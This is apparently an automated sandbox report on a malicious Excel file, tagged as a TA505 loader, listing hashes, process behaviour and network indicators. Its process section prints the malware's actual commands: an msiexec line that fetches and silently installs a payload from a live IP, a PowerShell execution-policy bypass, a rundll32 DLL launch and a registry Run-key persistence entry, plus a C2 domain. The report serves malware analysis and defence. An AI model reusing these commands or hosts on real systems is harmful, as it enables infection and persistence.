analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

D2398-0321.xls

Full analysis: https://app.any.run/tasks/8f11b973-fab4-4417-8af8-72ecc449f21d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 17:23:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:42:52 2019, Security: 0
MD5:

003277DA9690A749396DF9E3F51DF540

SHA1:

CCD62C42C80689A5B3DA7840F8770FFFBFDBC8C0

SHA256:

8E220396AB56096569DB278068738B65354521F4A5FB5073B626897FC0A54AC0

SSDEEP:

3072:LKpb8rGYrMPelwhKmFV5xtezEsgrdgWeEASNPzAKgncusE3v:LKpb8rGYrMPelwhKmFV5xtuEsgrdgWX2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 360)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 360)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 2084)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3416)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3416)
    • Application was dropped or rewritten from another process

      • ns9AE2.tmp (PID: 948)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4048)
    • Changes the autorun value in the registry

      • reg.exe (PID: 3968)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3416)
      • MSI9A07.tmp (PID: 648)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3416)
    • Starts CMD.EXE for commands execution

      • ns9AE2.tmp (PID: 948)
      • rundll32.exe (PID: 2084)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3780)
    • Starts application with an unusual extension

      • MSI9A07.tmp (PID: 648)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 2764)
    • Creates files in the user directory

      • powershell.exe (PID: 1484)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 360)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3416)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3416)
    • Loads dropped or rewritten executable

      • MSI9A07.tmp (PID: 648)
    • Application was dropped or rewritten from another process

      • MSI9A07.tmp (PID: 648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:03:21 06:42:52
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 1
  • 2
HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi9a07.tmp ns9ae2.tmp no specs cmd.exe no specs rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
360"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2308msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3416C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
648"C:\Windows\Installer\MSI9A07.tmp"C:\Windows\Installer\MSI9A07.tmp
msiexec.exe
User:
admin
Company:
hepsu burda
Integrity Level:
MEDIUM
Description:
hepsu burda Application
Version:
1.0.2.1
948"C:\Users\admin\AppData\Local\Temp\nsn9AD1.tmp\ns9AE2.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Users\admin\AppData\Local\Temp\nsn9AD1.tmp\ns9AE2.tmpMSI9A07.tmp
User:
admin
Integrity Level:
MEDIUM
3780"cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\cmd.exens9AE2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2084rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4048cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1484powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2764cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /fC:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 047
Read events
941
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
10
Unknown types
4

Dropped files

PID
Process
Filename
Type
360EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8A26.tmp.cvr
MD5:
SHA256:
3416msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFEF9B7CBC68C81A2A.TMP
MD5:
SHA256:
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZI2JNA78QV3KSNI7NOKJ.temp
MD5:
SHA256:
3416msiexec.exeC:\Windows\Installer\MSI93AB.tmpexecutable
MD5:D4C11BDA021113CA4604D80896B2A492
SHA256:AE2B1B1F7265386EDBBF2617084F277CDB9BC5AC34BD9AAC00CBC77A6BDCD829
3416msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3416msiexec.exeC:\Windows\Installer\MSI9A07.tmpexecutable
MD5:DDAE8B7AA9A93CE17610EB063F5838CE
SHA256:E0323064F2561AE02F9EFAE418AEAF433B3FE0E6E3A640A9C46EC404D4563DE1
3416msiexec.exeC:\Windows\Installer\f98dc.ipibinary
MD5:6236FC2B3E0ED6C7D874C1B5E3768B54
SHA256:D11096B4882691E128FD8383514D6E2760FE6746F4FCB00ECE49F09E22F8CC44
3416msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2084rundll32.exeC:\Users\admin\AppData\Local\Temp\enu.ps1text
MD5:6D3EA32EB833D773CBF7B7119AA384AD
SHA256:DA7465F14CD8A934668F59974E8836E02A9B1FF948BFE964040B840AB61697DC
648MSI9A07.tmpC:\Users\admin\AppData\Local\Temp\xmlparse.dllexecutable
MD5:6675C63A2534FD65B3B2DA751F2B393F
SHA256:BEE3B2710F7E874CE05E6B8B45CC20E021B9C00EE337238598E71E7315128333
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3416
msiexec.exe
GET
200
169.239.128.104:80
http://169.239.128.104/alg
ZA
executable
396 Kb
suspicious
2084
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
140 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2084
rundll32.exe
179.43.156.37:80
cdnavupdate.icu
Private Layer INC
CH
suspicious
3416
msiexec.exe
169.239.128.104:80
Zappie Host LLC
ZA
suspicious

DNS requests

Domain
IP
Reputation
cdnavupdate.icu
  • 179.43.156.37
malicious

Threats

PID
Process
Class
Message
3416
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3416
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
2084
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
1 ETPRO signatures available at the full report
No debug info